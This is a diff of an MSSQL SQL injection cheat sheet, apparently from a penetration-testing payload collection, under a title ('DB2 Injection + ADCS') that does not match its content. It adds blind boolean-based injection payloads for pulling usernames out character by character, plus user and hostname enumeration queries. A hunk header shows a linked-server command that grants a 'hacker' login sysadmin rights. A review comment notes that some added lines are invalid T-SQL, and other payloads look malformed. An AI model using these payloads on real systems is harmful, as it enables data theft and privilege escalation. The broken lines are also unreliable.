DB2 Injection + ADCS
@@ -2,9 +2,11 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [MSSQL comments](#mssql-comments)
|
||||
* [MSSQL version](#mssql-version)
|
||||
* [MSSQL database name](#mssql-database-name)
|
||||
* [MSSQL Comments](#mssql-comments)
|
||||
* [MSSQL User](#mssql-user)
|
||||
* [MSSQL Version](#mssql-version)
|
||||
* [MSSQL Hostname](#mssql-hostname)
|
||||
* [MSSQL Database name](#mssql-database-name)
|
||||
* [MSSQL List databases](#mssql-list-databases)
|
||||
* [MSSQL List columns](#mssql-list-columns)
|
||||
* [MSSQL List tables](#mssql-list-tables)
|
||||
@@ -22,7 +24,7 @@
|
||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||
|
||||
## MSSQL comments
|
||||
## MSSQL Comments
|
||||
|
||||
```sql
|
||||
-- comment goes here
|
||||
@@ -33,6 +35,9 @@
|
||||
|
||||
```sql
|
||||
SELECT CURRENT_USER
|
||||
SELECT user_name();
|
||||
SELECT system_user;
|
||||
SELECT user;
|
||||
```
|
||||
|
||||
## MSSQL version
|
||||
@@ -41,7 +46,14 @@ SELECT CURRENT_USER
|
||||
SELECT @@version
|
||||
```
|
||||
|
||||
## MSSQL database name
|
||||
## MSSQL Hostname
|
||||
|
||||
```sql
|
||||
SELECT HOST_NAME()
|
||||
SELECT @@hostname;
|
||||
```
|
||||
|
||||
## MSSQL Database name
|
||||
|
||||
```sql
|
||||
SELECT DB_NAME()
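Review bot: The added `SELECT @@hostname;` line under "MSSQL Hostname" does not look like valid T-SQL: `@@hostname` is a MySQL system variable, and SQL Server would treat it as an undeclared variable, so the line probably belongs on the MySQL page rather than here. The other added line needs a caveat as well, because `HOST_NAME()` returns the workstation name supplied by the client connection, not the name of the database server, and that value is client-controlled. I would add a comment such as `-- HOST_NAME(): workstation name reported by the client, not the server; do not rely on it for auditing or access decisions` so readers and defenders do not misread what the query discloses. Which lines of this section are additions is inferred from the hunk header counts, since the +/- markers are missing on this page.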
|
||||
@@ -122,6 +134,13 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
|
||||
## MSSQL Blind based
|
||||
|
||||
```sql
|
||||
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
|
||||
|
||||
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
|
||||
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
|
||||
|
||||
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
|
||||
|
||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||
|
||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||
@@ -283,4 +302,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
|
||||
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
||||
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
||||
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)
|
||||